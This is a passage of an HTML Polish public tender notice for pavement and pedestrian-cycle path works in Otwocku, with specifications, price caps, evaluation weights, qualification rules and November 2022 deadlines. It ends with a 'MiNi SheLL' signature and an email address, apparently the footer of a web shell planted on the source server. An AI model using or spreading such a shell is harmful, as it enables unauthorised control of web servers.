ustawić oporniki betonowe za łączną kwotę 300 000,00 zł brutto.<br/>5.	Wykonawca dokona rozbiórki istniejącej nawierzchni chodnika wraz z wykonaniem nowej nawierzchni z kostki betonowej prostokątnej 20x10 cm grubości 6 cm koloru szarego bezfazowej układanej na posypce cementowo – piaskowej grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości warstwy po zagęszczeniu min 15 cm.<br/>6.	Chodnik należy wykonać o szerokości jak występuje w terenie zaokrąglanej w górę o 0,5 m tzn. szerokości 1,5 m lub 2,0 m mierzonej jako szerokość nawierzchni pomiędzy elementami ograniczającymi tj. krawężnik i obrzeże. W miejscach gdzie niemożliwe jest wykonanie chodnika o min. szerokości 1,5 m lub zaokrąglonej w górę o 0,5 m z uwagi na występujące przeszkody terenowe tj. ogrodzenia, budynki itp. nawierzchnię należy wykonać do przeszkody. Nawierzchnia chodnika musi zostać wykonana ze spadkiem wynoszącym 2 % w kierunku jezdni. <br/>7.	Wykonawca zobowiązany jest do wymiany nawierzchni zjazdów indywidualnych i publicznych w granicy pasa drogowego z kostki betonowej prostokątnej 20 x10 o grubości 8 cm koloru grafitowego bezfazowej układanej na posypce cementowo- piaskowej o grubości min. 5 cm i podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości warstwy po zagęszczeniu min. 25 cm. Zjazdy należy obstawić w oporniku szer. 12 cm na odcinku wychodzącym poza chodnik oraz od strony jezdni oraz nieruchomości prywatnych.<br/>8.	W ramach inwestycji należy dokonać regulacji wysokościowej wystających elementów infrastruktury tj. skrzynki zaworów, zasuw i hydrantów występujących w modernizowanej nawierzchni chodnika i zjazdów. Regulację należy przeprowadzić w uzgodnieniu z gestorami sieci.<br/>9.	Po zakończonych robotach celem rozliczenia należy przedłożyć dokumentację powykonawczą w skład której muszą wchodzić między innymi wyniki przeprowadzonych badań, atesty oraz certyfikaty na wbudowane materiały oraz inne wg potrzeby Zamawiającego.<br/>10.	Potwierdzenie faktycznego wykonania robót zostanie przeprowadzone przez Wykonawcę oraz przedstawiciela Zamawiającego. W przypadku rozbieżności należy sporządzić geodezyjną inwentaryzację powykonawczą ze wskazaniem powierzchni, długości odcinków sporządzoną przez uprawnionego Geodetę. Koszt sporządzenia geodezyjnej inwentaryzacji pokrywa Wykonawca.<br/>Zamawiający informuje, że rozliczenie nastąpi w formie wynagrodzenia obmiarowego. Wynagrodzenie będzie liczone jako iloczyn podanej w formularzu ofertowym ceny brutto i faktycznie wykonanych robót, lecz łączna wartość wynagrodzenia za wykonane roboty budowlane nie może być wyższa niż 300 000,00 zł brutto. Wykonawca w ofercie zobowiązany jest do podania ceny brutto za:<br/>- ustawienie 1 mb obrzeży betonowych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15 wraz z materiałem oraz rozbiórką istniejącego obrzeża,<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 6 cm koloru szarego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy po zagęszczeniu min. 15 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – chodnik;<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm koloru grafitowego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 25 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – zjazdy<br/>- ustawieniem 1mb opornika betonowego na ławie wraz z oporem z betonu; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 6 cm koloru szarego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy po zagęszczeniu min. 15 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – chodnik</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm koloru grafitowego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 25 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – zjazdy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za ustawieniem 1mb opornika betonowego na ławie wraz z oporem z betonu;</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> części III – Modernizacja nawierzchni chodnika w drodze powiatowej ul. Żeromskiego w Otwocku<br/>Przedmiot zamówienia obejmuje: <br/>8.	Wykonanie robót rozbiórkowych istniejących elementów ciągu pieszo-rowerowego tj. obrzeży, nawierzchni chodnika,<br/>9.	Wykonanie korytowania na średnią głębokość 28 cm mierzoną od góry nawierzchni chodnika, koryto musi być wyprofilowane oraz zagęszczone przy czym współczynnik zagęszczenia musi wynosić Is ≥ 1,0,<br/>10.	Regulacji wysokościowej oraz sytuacyjnej istniejących obrzeży betonowych gr. 8 cm wraz uzupełnieniem i wyprofilowaniem nawierzchni za nimi.<br/>11.	Ustawienie nowych obrzeży ulicznych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15 – wg wskazań Zamawiającego,<br/>12.	Wykonanie podbudowy z kruszywa łamanego 0-31,5 mm – warstwa górna o grubości po zagęszczeniu 15 cm dla ciągu pieszo - rowerowego, przy czym stosunek modułu wtórnego E2 do pierwotnego E1 musi być mniejszy bądź równy 2,2 a E1 musi wynosić min. 80 MPa;<br/>13.	Wykonanie nawierzchni ciągu pieszo - rowerowego o szerokości 2,5 m z betonowej kostki brukowej prostokątnej 10 x 20 cm o grubości 6 cm bezfazowej, na podsypce cementowo – piaskowej 1:5 grubości min. 5 cm, nawierzchnię ciągu pieszo - rowerowego należy układać przy zachowaniu spadku poprzecznego wynoszącego 2 % w stronę jezdni, nawierzchnia musi zostać zamulona piaskiem. Kolor nawierzchni ustalić z Zamawiającym.<br/>14.	Wykonaniu przełożenia istniejącej nawierzchni ciągu pieszo – rowerowego o szer. 2,5 m wykonanego z płyt betonowych o orientacyjnym wymiarze 30x30x5 cm. W ramach przełożenia istniejącej nawierzchni należy wyprofilować jej spadek poprzeczny oraz podłużny. Nawierzchnie wykonać na podsypce cementowo – piaskowej grubości min. 5 cm.<br/><br/><br/>Informacje dotyczące zadania <br/>12.	Prace należy przeprowadzić na ulicy Żeromskiego w Otwocku,<br/>13.	Prace należy prowadzić na odcinku pomiędzy działką nr. ew. 19/3 z obr. 61, a działką nr. ew. 4/6 z obr. 237 w Otwocku,<br/>14.	Remont ciągu pieszo - rowerowego należy przeprowadzić po istniejącym jego śladzie, <br/>15.	W ramach zamówienia należy ustawić obrzeża, wykonać nawierzchnię z kostki betonowej, wykonać przełożenia istniejącej nawierzchni za łączną kwotę 200 000,00 zł brutto.<br/>16.	Wykonawca dokona rozbiórki istniejącej nawierzchni ciągu pieszo - rowerowego wraz z wykonaniem nowej nawierzchni z kostki betonowej prostokątnej 20x10 cm grubości 6 cm bezfazowej układanej na posypce cementowo – piaskowej grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości warstwy po zagęszczeniu min 15 cm. <br/>17.	Ciąg pieszo – rowerowy należy wykonać szerokości 2,5 m mierzonej jako szerokość nawierzchni pomiędzy elementami ograniczającymi tj. obrzeża. Nawierzchnia musi zostać wykonana ze spadkiem wynoszącym ok. 2% w kierunku jezdni.<br/>18.	Wykonawca dokona przełożenia istniejącej nawierzchni ciągu pieszo – rowerowego z odzyskanych materiałów układanych na podsypce cementowo – piaskowej gr. min. 5 cm. Należy uzyskać wrażenie wykonania nawierzchni o równej powierzchni oraz spadku poprzecznym w kierunku krawędzi jezdni.<br/>19.	W ramach inwestycji należy dokonać regulacji wysokościowej wystających elementów infrastruktury tj. skrzynki zaworów, zasuw i hydrantów występujących w modernizowanej nawierzchni ciągu pieszo - rowerowego. Regulację należy przeprowadzić w uzgodnieniu z gestorami sieci.<br/>20.	Po zakończonych robotach celem rozliczenia należy przedłożyć dokumentację powykonawczą w skład której muszą wchodzić między innymi wyniki przeprowadzonych badań, atesty oraz certyfikaty na wbudowane materiały oraz inne wg potrzeby Zamawiającego.<br/>21.	Potwierdzenie faktycznego wykonania robót zostanie przeprowadzone przez Wykonawcę oraz przedstawiciela Zamawiającego. W przypadku rozbieżności należy sporządzić geodezyjną inwentaryzację powykonawczą ze wskazaniem powierzchni, długości odcinków sporządzoną przez uprawnionego Geodetę. Koszt sporządzenia geodezyjnej inwentaryzacji pokrywa Wykonawca.<br/>Zamawiający informuje, że rozliczenie nastąpi w formie wynagrodzenia obmiarowego. Wynagrodzenie będzie liczone jako iloczyn podanej w formularzu ofertowym ceny brutto i faktycznie wykonanych robót, lecz łączna wartość wynagrodzenia za wykonane roboty budowlane nie może być wyższa niż 200 000,00 zł brutto. Wykonawca w ofercie zobowiązany jest do podania ceny brutto za:<br/>- ustawienie 1 mb obrzeży betonowych 8x30x100 cm na ławie z oporem z betonu cementowego C 12/15 wraz z materiałem oraz rozbiórką istniejącego obrzeża,<br/>- regulacji wysokościowej oraz sytuacyjnej 1 mb istniejącego obrzeża wraz z obsypaniem ziemią oraz wyprofilowaniem terenu za nim,<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 6 cm k bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania;<br/>- wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 6 cm bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 15 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania;<br/>- wykonanie 1 m2 przełożenia istniejącej nawierzchni z płyt betonowych z ponownym ich ułożeniem na podsypce cementowo – piaskowej gr. min. 5 cm z wyprofilowaniem podłoża wraz z niezbędnym materiałem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie regulacji wysokościowej oraz sytuacyjnej 1 mb istniejącego obrzeża wraz z obsypaniem ziemią oraz wyprofilowaniem terenu za nim</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 6 cm koloru szarego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy po zagęszczeniu min. 15 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – chodnik</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 nawierzchni z kostki betonowej prostokątnej 20x10 cm o grubości 8 cm koloru grafitowego bezfazowej układanej na podsypce cementowo – piaskowej o grubości min. 5 cm oraz podbudowie z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy min. 25 cm wraz z materiałem, rozbiórką istniejącej nawierzchni i wykonaniem korytowania – zjazdy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto za wykonanie 1 m2 przełożenia istniejącej nawierzchni z płyt betonowych z ponownym ich ułożeniem na podsypce cementowo – piaskowej gr. min. 5 cm z wyprofilowaniem podłoża wraz z niezbędnym materiałem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>a)	sytuacji ekonomicznej i finansowej –Zamawiający nie stawia warunku w powyższym zakresie,<br/>b)	zdolności technicznej i zawodowej: Wykonawca spełni warunek, jeżeli wykaże że:<br/>a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na budowie, przebudowie, rozbudowie, remoncie chodnika lub ciągu pieszo-rowerowego w drodze powiatowej klasy co najmniej Z. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - Zamawiający nie wymaga złożenia do oferty informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie. Zamawiający wymaga wykazania tylko zamówień niezbędnych dla spełnienia warunku określonego w SIWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 podstaw wykluczenia z postępowania.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 28) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>29) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem (liderem).<br/>30) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonują poszczególni wykonawcy.<br/>31) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <br/>32) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni<br/>przed zwarciem umowy w sprawie zamówienia publicznego są zobowiązaniu przedstawić zamawiającemu stosowną umowę<br/>regulującą współprace tych Wykonawców występujących wspólnie, zawierającą w swej treści następujące postanawiania:<br/> Określenie celu gospodarczego<br/> Oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu zamówienia,<br/> Podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie, zgodnie z oświadczeniem,<br/> Wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z Wykonawców występujących do czasu<br/>wykonania zamówienia w całości,<br/> Solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację przedmiotu zamówienia,<br/> Solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im przysługiwały w związku z realizacją<br/>przedmiotu zamówienia w ramach zawartej z Zamawiającym Umowy<br/> Określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego Wykonawcom w związku z realizacją<br/>zamówienia, zgodnie z którym faktury na rzecz Zamawiającego będzie wystawiał Lider, który będzie się rozliczał<br/>wewnętrznie z drugim członkiem konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)	Zmiany terminu wykonania umowy o czas opóźnienia realizacji przedmiotu umowy, jeżeli takie opóźnienie wystąpi i będzie miało wpływ na wykonanie przedmiotu umowy, w sytuacji:<br/>m)	wstrzymania (zawieszenia) realizacji przedmiotu umowy (w części lub w całości) na żądanie Zamawiającego z przyczyn niezależnych od Wykonawcy i obiektywnie uzasadnionych na okres trwający łącznie ponad 48 godzin,<br/>n)	wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,<br/>o)	istotnej zmiany w dokumentacji dot. przedmiotu umowy dokonanej na wniosek Zamawiającego,<br/>p)	wystąpienia znalezisk archeologicznych bądź niewybuchów, niewypałów lub wykopalisk archeologicznych,<br/>q)	wystąpienia awarii lub katastrofy budowlanej, nie wynikającej z działania lub zaniechania Wykonawcy,<br/>r)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami w tym niedopuszczenia do realizacji przedmiotu umowy (w części lub w całości) bądź wstrzymania (zawieszenia) realizacji przedmiotu umowy (w części lub w całości) przez uprawniony organ z przyczyn niezależnych od Wykonawcy;<br/>2)	Zamiany osobowe:<br/>g)	zmiana osób, realizujących przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub w innych ustawach,<br/>h)	zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg określony w SWZ,<br/>i)	zmiany osoby pełniącej funkcję Inspektora nadzoru;<br/>3)	Zmiany organizacji spełnienia świadczenia w zakresie zmiany zasad dokonywania odbiorów świadczonych robot budowlanych. <br/>4)	Zmiany terminu płatności wynikające z wszelkich zmian wprowadzonych do umowy.<br/>5)	Zmiany wysokości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług.<br/>6)	Zmiany umowy w przypadku wydłużenia okresu gwarancji i rękojmi z powodu zmian wprowadzonych do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/edit-auction.html/371669</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-08 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com